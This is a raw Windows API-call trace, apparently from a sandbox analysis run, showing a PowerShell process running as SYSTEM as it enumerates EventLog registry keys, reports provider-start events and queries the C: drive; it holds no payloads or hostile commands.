	[0089.237] RegEnumKeyExW (in: hKey=0x318, dwIndex=0x1, lpName=0x361778, lpcchName=0x14e7f0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x14e7f0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0089.237] RegEnumKeyExW (in: hKey=0x318, dwIndex=0x2, lpName=0x361778, lpcchName=0x14e7f0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x14e7f0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0089.237] RegEnumKeyExW (in: hKey=0x318, dwIndex=0x3, lpName=0x361778, lpcchName=0x14e7f0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x14e7f0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0089.237] RegEnumKeyExW (in: hKey=0x318, dwIndex=0x4, lpName=0x361778, lpcchName=0x14e7f0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x14e7f0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0089.237] RegEnumKeyExW (in: hKey=0x318, dwIndex=0x5, lpName=0x361778, lpcchName=0x14e7f0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x14e7f0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0089.238] RegEnumKeyExW (in: hKey=0x318, dwIndex=0x6, lpName=0x361778, lpcchName=0x14e7f0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x14e7f0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0089.238] RegEnumKeyExW (in: hKey=0x318, dwIndex=0x7, lpName=0x361778, lpcchName=0x14e7f0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x14e7f0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0089.238] RegEnumKeyExW (in: hKey=0x318, dwIndex=0x8, lpName=0x361778, lpcchName=0x14e7f0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x14e7f0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0089.238] RegOpenKeyExW (in: hKey=0x318, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e79c | out: phkResult=0x14e79c*=0x2f4) returned 0x0
	[0089.238] RegOpenKeyExW (in: hKey=0x2f4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e79c | out: phkResult=0x14e79c*=0x0) returned 0x2
	[0089.238] RegOpenKeyExW (in: hKey=0x318, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e79c | out: phkResult=0x14e79c*=0x31c) returned 0x0
	[0089.238] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e79c | out: phkResult=0x14e79c*=0x0) returned 0x2
	[0089.239] RegOpenKeyExW (in: hKey=0x318, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e79c | out: phkResult=0x14e79c*=0x320) returned 0x0
	[0089.239] RegOpenKeyExW (in: hKey=0x320, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e79c | out: phkResult=0x14e79c*=0x0) returned 0x2
	[0089.239] RegOpenKeyExW (in: hKey=0x318, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e79c | out: phkResult=0x14e79c*=0x324) returned 0x0
	[0089.239] RegOpenKeyExW (in: hKey=0x324, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e79c | out: phkResult=0x14e79c*=0x0) returned 0x2
	[0089.239] RegOpenKeyExW (in: hKey=0x318, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e79c | out: phkResult=0x14e79c*=0x328) returned 0x0
	[0089.239] RegOpenKeyExW (in: hKey=0x328, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e79c | out: phkResult=0x14e79c*=0x0) returned 0x2
	[0089.239] RegOpenKeyExW (in: hKey=0x318, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e79c | out: phkResult=0x14e79c*=0x32c) returned 0x0
	[0089.239] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e79c | out: phkResult=0x14e79c*=0x0) returned 0x2
	[0089.240] RegOpenKeyExW (in: hKey=0x318, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e79c | out: phkResult=0x14e79c*=0x330) returned 0x0
	[0089.240] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e79c | out: phkResult=0x14e79c*=0x0) returned 0x2
	[0089.240] RegOpenKeyExW (in: hKey=0x318, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e79c | out: phkResult=0x14e79c*=0x334) returned 0x0
	[0089.240] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e79c | out: phkResult=0x14e79c*=0x0) returned 0x2
	[0089.240] RegOpenKeyExW (in: hKey=0x318, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e79c | out: phkResult=0x14e79c*=0x338) returned 0x0
	[0089.240] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e79c | out: phkResult=0x14e79c*=0x33c) returned 0x0
	[0089.240] RegCloseKey (hKey=0x33c) returned 0x0
	[0089.240] RegCloseKey (hKey=0x318) returned 0x0
	[0089.241] RegCloseKey (hKey=0x338) returned 0x0
	[0089.241] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e760 | out: phkResult=0x14e760*=0x338) returned 0x0
	[0089.241] RegQueryInfoKeyW (in: hKey=0x338, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x14e7c8, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14e7c4, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x14e7c8*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14e7c4*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0089.241] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x0, lpName=0x361778, lpcchName=0x14e7e4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x14e7e4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0089.241] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x1, lpName=0x361778, lpcchName=0x14e7e4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x14e7e4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0089.241] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x2, lpName=0x361778, lpcchName=0x14e7e4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x14e7e4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0089.241] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x3, lpName=0x361778, lpcchName=0x14e7e4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x14e7e4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0089.242] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x4, lpName=0x361778, lpcchName=0x14e7e4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x14e7e4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0089.242] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x5, lpName=0x361778, lpcchName=0x14e7e4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x14e7e4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0089.242] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x6, lpName=0x361778, lpcchName=0x14e7e4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x14e7e4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0089.242] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x7, lpName=0x361778, lpcchName=0x14e7e4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x14e7e4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0089.242] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x8, lpName=0x361778, lpcchName=0x14e7e4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x14e7e4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0089.242] RegOpenKeyExW (in: hKey=0x338, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e790 | out: phkResult=0x14e790*=0x318) returned 0x0
	[0089.242] RegOpenKeyExW (in: hKey=0x318, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e790 | out: phkResult=0x14e790*=0x0) returned 0x2
	[0089.242] RegOpenKeyExW (in: hKey=0x338, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e790 | out: phkResult=0x14e790*=0x33c) returned 0x0
	[0089.242] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e790 | out: phkResult=0x14e790*=0x0) returned 0x2
	[0089.243] RegOpenKeyExW (in: hKey=0x338, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e790 | out: phkResult=0x14e790*=0x340) returned 0x0
	[0089.243] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e790 | out: phkResult=0x14e790*=0x0) returned 0x2
	[0089.243] RegOpenKeyExW (in: hKey=0x338, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e790 | out: phkResult=0x14e790*=0x344) returned 0x0
	[0089.243] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e790 | out: phkResult=0x14e790*=0x0) returned 0x2
	[0089.243] RegOpenKeyExW (in: hKey=0x338, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e790 | out: phkResult=0x14e790*=0x348) returned 0x0
	[0089.243] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e790 | out: phkResult=0x14e790*=0x0) returned 0x2
	[0089.243] RegOpenKeyExW (in: hKey=0x338, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e790 | out: phkResult=0x14e790*=0x34c) returned 0x0
	[0089.243] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e790 | out: phkResult=0x14e790*=0x0) returned 0x2
	[0089.243] RegOpenKeyExW (in: hKey=0x338, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e790 | out: phkResult=0x14e790*=0x350) returned 0x0
	[0089.244] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e790 | out: phkResult=0x14e790*=0x0) returned 0x2
	[0089.244] RegOpenKeyExW (in: hKey=0x338, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e790 | out: phkResult=0x14e790*=0x354) returned 0x0
	[0089.244] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e790 | out: phkResult=0x14e790*=0x0) returned 0x2
	[0089.244] RegOpenKeyExW (in: hKey=0x338, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e790 | out: phkResult=0x14e790*=0x358) returned 0x0
	[0089.244] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e790 | out: phkResult=0x14e790*=0x35c) returned 0x0
	[0089.244] RegCloseKey (hKey=0x35c) returned 0x0
	[0089.244] RegCloseKey (hKey=0x338) returned 0x0
	[0089.244] RegCloseKey (hKey=0x358) returned 0x0
	[0089.246] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x35c0004
	[0089.248] GetLastError () returned 0x0
	[0089.249] ReportEventW (hEventLog=0x35c0004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x1d5dde4*="WSMan", lpRawData=0x1d5dc8c) returned 1
	[0089.250] GetLastError () returned 0x0
	[0089.251] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0089.251] GetLastError () returned 0xcb
	[0089.251] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e304, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.251] GetLastError () returned 0xcb
	[0089.251] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e2b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.251] GetLastError () returned 0xcb
	[0089.251] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e2b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.251] GetLastError () returned 0xcb
	[0089.251] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x367d10, nSize=0x14e904 | out: lpNameBuffer="WORKGROUP\\ZGW5TDPU$", nSize=0x14e904) returned 0x1
	[0089.252] GetLastError () returned 0xcb
	[0089.252] GetUserNameW (in: lpBuffer=0x361778, pcbBuffer=0x14e90c | out: lpBuffer="SYSTEM", pcbBuffer=0x14e90c) returned 1
	[0089.252] ReportEventW (hEventLog=0x35c0004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x1d61c70*="Alias", lpRawData=0x1d61b2c) returned 1
	[0089.252] GetLastError () returned 0x0
	[0089.253] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0089.253] GetLastError () returned 0xcb
	[0089.253] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e304, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.253] GetLastError () returned 0xcb
	[0089.253] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e2b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.253] GetLastError () returned 0xcb
	[0089.253] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e2b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.253] GetLastError () returned 0xcb
	[0089.254] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x367d10, nSize=0x14e904 | out: lpNameBuffer="WORKGROUP\\ZGW5TDPU$", nSize=0x14e904) returned 0x1
	[0089.254] GetLastError () returned 0xcb
	[0089.254] GetUserNameW (in: lpBuffer=0x361778, pcbBuffer=0x14e90c | out: lpBuffer="SYSTEM", pcbBuffer=0x14e90c) returned 1
	[0089.254] ReportEventW (hEventLog=0x35c0004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x1d65bb4*="Environment", lpRawData=0x1d65a70) returned 1
	[0089.254] GetLastError () returned 0x0
	[0089.255] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0089.255] GetLastError () returned 0xcb
	[0089.255] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0089.255] GetLastError () returned 0xcb
	[0089.255] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0089.255] GetLastError () returned 0xcb
	[0089.256] GetLogicalDrives () returned 0x4
	[0089.256] GetLastError () returned 0xcb
	[0089.256] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x14e358, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0089.256] GetLastError () returned 0xcb
	[0089.257] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0089.257] GetLastError () returned 0xcb
	[0089.257] SetErrorMode (uMode=0x1) returned 0x1
	[0089.257] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x361878, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x14e880, lpMaximumComponentLength=0x14e87c, lpFileSystemFlags=0x14e878, lpFileSystemNameBuffer=0x361778, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x14e880*=0x64285303, lpMaximumComponentLength=0x14e87c*=0xff, lpFileSystemFlags=0x14e878*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0089.258] GetLastError () returned 0xcb
	[0089.258] SetErrorMode (uMode=0x1) returned 0x1
	[0089.258] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0089.258] GetLastError () returned 0xcb
	[0089.258] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x14e3e0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0089.258] GetLastError () returned 0xcb
	[0089.258] SetErrorMode (uMode=0x1) returned 0x1
	[0089.258] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1d66aa4 | out: lpFileInformation=0x1d66aa4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xe662e5bd, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0x630b8bd0, ftLastAccessTime.dwHighDateTime=0x1d46cf7, ftLastWriteTime.dwLowDateTime=0x630b8bd0, ftLastWriteTime.dwHighDateTime=0x1d46cf7, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0089.258] GetLastError () returned 0xcb
	[0089.258] SetErrorMode (uMode=0x1) returned 0x1
	[0089.258] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x14e3e0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0089.258] GetLastError () returned 0xcb
	[0089.258] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x14e36c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0089.258] GetLastError () returned 0xcb
	[0089.258] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0089.258] GetLastError () returned 0xcb
	[0089.259] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x14e328, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0089.259] GetLastError () returned 0xcb
	[0089.259] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0089.259] GetLastError () returned 0xcb
	[0089.259] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x14e330, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0089.259] GetLastError () returned 0xcb
	[0089.259] SetErrorMode (uMode=0x1) returned 0x1
	[0089.259] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1d676fc | out: lpFileInformation=0x1d676fc*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xe662e5bd, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0x630b8bd0, ftLastAccessTime.dwHighDateTime=0x1d46cf7, ftLastWriteTime.dwLowDateTime=0x630b8bd0, ftLastWriteTime.dwHighDateTime=0x1d46cf7, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0089.259] GetLastError () returned 0xcb
	[0089.259] SetErrorMode (uMode=0x1) returned 0x1
	[0089.259] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x14e338, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0089.259] GetLastError () returned 0xcb
	[0089.259] SetErrorMode (uMode=0x1) returned 0x1
	[0089.259] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1d6784c | out: lpFileInformation=0x1d6784c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xe662e5bd, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0x630b8bd0, ftLastAccessTime.dwHighDateTime=0x1d46cf7, ftLastWriteTime.dwLowDateTime=0x630b8bd0, ftLastWriteTime.dwHighDateTime=0x1d46cf7, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0089.260] GetLastError () returned 0xcb
	[0089.260] SetErrorMode (uMode=0x1) returned 0x1
	[0089.260] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x14e37c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0089.260] GetLastError () returned 0xcb
	[0089.260] SetErrorMode (uMode=0x1) returned 0x1
	[0089.260] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1d679ec | out: lpFileInformation=0x1d679ec*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xe662e5bd, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0x630b8bd0, ftLastAccessTime.dwHighDateTime=0x1d46cf7, ftLastWriteTime.dwLowDateTime=0x630b8bd0, ftLastWriteTime.dwHighDateTime=0x1d46cf7, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0089.260] GetLastError () returned 0xcb
	[0089.260] SetErrorMode (uMode=0x1) returned 0x1
	[0089.260] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x367d10, nSize=0x14e904 | out: lpNameBuffer="WORKGROUP\\ZGW5TDPU$", nSize=0x14e904) returned 0x1
	[0089.260] GetLastError () returned 0xcb
	[0089.260] GetUserNameW (in: lpBuffer=0x361778, pcbBuffer=0x14e90c | out: lpBuffer="SYSTEM", pcbBuffer=0x14e90c) returned 1
	[0089.261] ReportEventW (hEventLog=0x35c0004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x1d6a724*="FileSystem", lpRawData=0x1d6a5e0) returned 1
	[0089.261] GetLastError () returned 0x0
	[0089.261] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0089.261] GetLastError () returned 0xcb
	[0089.261] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.261] GetLastError () returned 0xcb
	[0089.262] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.262] GetLastError () returned 0xcb
	[0089.262] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.262] GetLastError () returned 0xcb
	[0089.262] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x367d10, nSize=0x14e904 | out: lpNameBuffer="WORKGROUP\\ZGW5TDPU$", nSize=0x14e904) returned 0x1
	[0089.262] GetLastError () returned 0xcb
	[0089.262] GetUserNameW (in: lpBuffer=0x361778, pcbBuffer=0x14e90c | out: lpBuffer="SYSTEM", pcbBuffer=0x14e90c) returned 1
	[0089.263] ReportEventW (hEventLog=0x35c0004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x1d6e7c4*="Function", lpRawData=0x1d6e680) returned 1
	[0089.263] GetLastError () returned 0x0
	[0089.264] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0089.266] GetLastError () returned 0xcb
	[0089.268] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e318, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
